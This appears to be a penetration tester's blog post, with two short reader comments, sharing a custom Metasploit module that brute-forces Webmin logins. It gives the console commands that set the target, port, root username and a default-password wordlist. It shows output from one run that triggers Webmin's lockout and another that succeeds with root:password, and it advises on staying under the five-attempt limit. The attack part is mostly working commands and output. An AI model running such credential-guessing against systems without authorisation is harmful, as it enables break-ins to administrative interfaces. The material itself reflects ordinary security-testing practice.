At least one gotcha i discovered is that webmin will block the IP after four or five (usually 5) attempts. I believe the default is 300 seconds it will also supposedly increase the delay if the same host keeps hitting it.
I took the approach to throw 5 passwords at it, if its not something super obvious then i'd move along. maybe not the best solution but i wanted to make sure it wasn't root/root or webmin/webmin and move on.
msf auxiliary(webmin_login_brute) > set RHOSTS 192.168.1.1
RHOSTS => 192.168.1.1
smsf auxiliary(webmin_login_brute) > set RPORT 10000
RPORT => 10000
smsf auxiliary(webmin_login_brute) > set SSL TRUE
SSL => TRUE
msf auxiliary(webmin_login_brute) > set BLANK_PASSWORDS false
BLANK_PASSWORDS => false
setmsf auxiliary(webmin_login_brute) > set USER_AS_PASS false
USER_AS_PASS => false
set msf auxiliary(webmin_login_brute) > set USERNAME root
USERNAME => root
msf auxiliary(webmin_login_brute) > set PASS_FILE /root/.msf4/data/wordlists/webmin_defaults.txt
PASS_FILE => /root/.msf4/data/wordlists/webmin_defaults.txt
msf auxiliary(webmin_login_brute) > run
[*] Verifying login exists at http://192.168.1.1:10000/session_login.cgi
[*] http://192.168.1.1:10000/session_login.cgi - Webmin - Attempting authentication
[*] 192.168.1.1:10000 WEBMIN - [1/6] - /session_login.cgi - Webmin - Trying username:'root' with password:''
[-] 192.168.1.1:10000 WEBMIN - [1/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:''
[*] 192.168.1.1:10000 WEBMIN - [2/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'root'
[-] 192.168.1.1:10000 WEBMIN - [2/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'root'
[*] 192.168.1.1:10000 WEBMIN - [3/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'webmin'
[-] 192.168.1.1:10000 WEBMIN - [3/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'webmin'
[*] 192.168.1.1:10000 WEBMIN - [4/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password'
[-] 192.168.1.1:10000 WEBMIN - [4/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'password'
[*] 192.168.1.1:10000 WEBMIN - [5/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'letmein'
[-] 192.168.1.1:10000 WEBMIN - [5/6] - /session_login.cgi 403 - Webmin - We got blocked
[*] 192.168.1.1:10000 WEBMIN - [6/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password1'
[-] 192.168.1.1:10000 WEBMIN - [6/6] - /session_login.cgi 403 - Webmin - We got blocked
[*] Scanned 1 of 1 hosts (100% complete)
and looks like this when it works
[*] Verifying login exists at http://10.0.0.25:12321/session_login.cgi
[*] http://10.0.0.25:12321/session_login.cgi - Webmin - Attempting authentication
[*] 10.0.0.25:12321 WEBMIN - [1/6] - /session_login.cgi - Webmin - Trying username:'root' with password:''
[-] 10.0.0.25:12321 WEBMIN - [1/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:''
[*] 10.0.0.25:12321 WEBMIN - [2/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'root'
[-] 10.0.0.25:12321 WEBMIN - [2/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'root'
[*] 10.0.0.25:12321 WEBMIN - [3/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'webmin'
[-] 10.0.0.25:12321 WEBMIN - [3/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'webmin'
[*] 10.0.0.25:12321 WEBMIN - [4/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password'
[+] http://10.0.0.25:12321/session_login.cgi - Webmin - Login Successful 302 with 'root':'password' Redirect to->https://10.0.0.25:12321/
[*] 10.0.0.25:12321 WEBMIN - [5/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'letmein'
[-] 10.0.0.25:12321 WEBMIN - [5/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'letmein'
[*] 10.0.0.25:12321 WEBMIN - [6/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password1'
[-] 10.0.0.25:12321 WEBMIN - [6/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'password1'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
** note you have to unset the PASSWORD value too, for some reason its populating with a blank password and trying that which sucks if you only have five chances.
Code is here:
https://github.com/carnal0wnage/Metasploit-Code/blob/master/modules/auxiliary/scanner/webmin_login.rb
figured i'd let the blog serve as way to let people test prior to doing a pull request.
CG
Carefull!! You leaved the URL in the second line.
ReplyDeletethanks! fixed
ReplyDelete